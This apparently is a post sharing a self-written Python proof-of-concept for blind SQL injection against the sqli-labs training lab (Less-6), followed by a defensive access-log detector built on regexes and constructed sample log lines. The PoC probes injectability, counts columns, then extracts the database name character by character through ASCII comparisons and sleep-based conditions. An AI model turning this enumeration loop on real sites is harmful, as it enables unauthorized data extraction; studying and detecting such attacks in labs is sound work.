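sqli-labs Injection Tool (Injection PoC for Level 6)
As everyone knows, sqli-labs is an injection testing platform, and I believe many experts have played with it too. I wrote this PoC back in March; anyone who needs it can take a look.
I wrote the Python myself and my coding level is low, so please don't flame me~
This is the injection PoC for Level 6 (Less-6). For Level 5, you only need to change the double quote (") on line 44 of the code, in the url = str1 + ... assignment, to a single quote (').
It decides true or false from what the page echoes back, then guesses the length of the database name, then compares ASCII codes character by character to pick the correct one, and finally prints them in order. PoC: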
import requests


def panduan():
    url2 = str1 + "+1"
    result = requests.get(url2)
    if "SQL syntax" in result.text:  # Here is wrong
        print("Its not a injection!")
    else:
        print("Its a int injection")
        inject()


def inject():
    # Raise the ORDER BY index until the page stops answering "You are in".
    for i in range(1, 100):
        result = url + "+order+by+" + str(i) + "--+"
        result1 = requests.get(result)
        if "You are in" in result1.text:
            print(result)
        else:
            break
    mysql()


def mysql():
    # Guess the database-name length; a wrong guess runs sleep(5) and hides "You are in".
    a = 0
    for i in range(1, 10):
        url2 = url + " and if(length(database())=" + str(i) + ",2,sleep(5))--+"
        result = requests.get(url2)
        if "You are in" in result.text:
            a = i
    # Compare each character of the name against every printable ASCII code.
    for n in range(1, a + 1):
        for l in range(33, 126):
            url3 = url + " and ascii(substring(database()," + str(n) + ",1))=" + str(l) + " --+"
            result1 = requests.get(url3)
            if "You are in" in result1.text:
                print(str(l))


str1 = "http://127.0.0.1/sqli-labs-master/Less-6/?id=1"
url = str1 + '"'
url1 = requests.get(url)
if "SQL syntax" in url1.text:
    print("Its seems to be injectable")
else:
    print("Can't be injectable")
inject()
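
Seen from the server side, the character loop above leaves a recognisable trail in the access log: one client requesting ascii(substring(...)) comparisons across many positions and codes. The following is an added example, not part of the original post, that flags such a client. The Apache "combined" log format, the names detect_blind_enumeration and min_probes, and the sample IP addresses are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Request part of an Apache/nginx "combined" access-log line (assumed format).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<uri>\S+) [^"]*"')
# Probe shape sent by the PoC's inner loop: ascii(substring(expr, pos, 1)) = code
PROBE_RE = re.compile(
    r'ascii\s*\(\s*(?:substring|substr|mid)\s*\(.+?,\s*(?P<pos>\d+)\s*,\s*1\s*\)\s*\)'
    r'\s*=\s*(?P<code>\d+)', re.IGNORECASE)
# Length and timing probes that come before the character loop.
AUX_RE = re.compile(r'length\s*\(\s*database\s*\(\s*\)\s*\)|sleep\s*\(\s*\d+', re.IGNORECASE)

def detect_blind_enumeration(lines, min_probes=20):
    """Map each client IP that tried >= min_probes distinct (position, code) pairs to a summary."""
    probes = defaultdict(set)   # ip -> {(position, ascii code), ...}
    aux = defaultdict(int)      # ip -> count of length()/sleep() probes
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip = m.group("ip")
        uri = unquote_plus(m.group("uri"))   # undo %22, %20 and '+' before matching
        if AUX_RE.search(uri):
            aux[ip] += 1
        p = PROBE_RE.search(uri)
        if p:
            probes[ip].add((int(p.group("pos")), int(p.group("code"))))
    return {
        ip: {"probes": len(pairs),
             "positions": sorted({pos for pos, _ in pairs}),
             "aux": aux[ip]}
        for ip, pairs in probes.items() if len(pairs) >= min_probes
    }

def _entry(ip, uri):
    # Constructed log line, not captured traffic.
    return f'{ip} - - [01/Jan/2024:00:00:00 +0000] "GET {uri} HTTP/1.1" 200 721 "-" "-"'

BASE = "/sqli-labs-master/Less-6/?id=1"
SAMPLE_LOG = (   # constructed: 10.0.0.5 replays the PoC's request shape, 10.0.0.9 is ordinary
    [_entry("10.0.0.5", f"{BASE}%22%20and%20if(length(database())={i},2,sleep(5))--+") for i in range(1, 10)]
    + [_entry("10.0.0.5", f"{BASE}%22%20and%20ascii(substring(database(),{n},1))={c}%20--+")
       for n in (1, 2) for c in range(33, 126)]
    + [_entry("10.0.0.9", BASE), _entry("10.0.0.9", "/index.php?q=length+of+database")]
)

print(detect_blind_enumeration(SAMPLE_LOG))
```

Counting distinct (position, code) pairs rather than raw hits keeps one odd search query from tripping the rule, while the PoC's 93 comparisons per character clear any reasonable threshold.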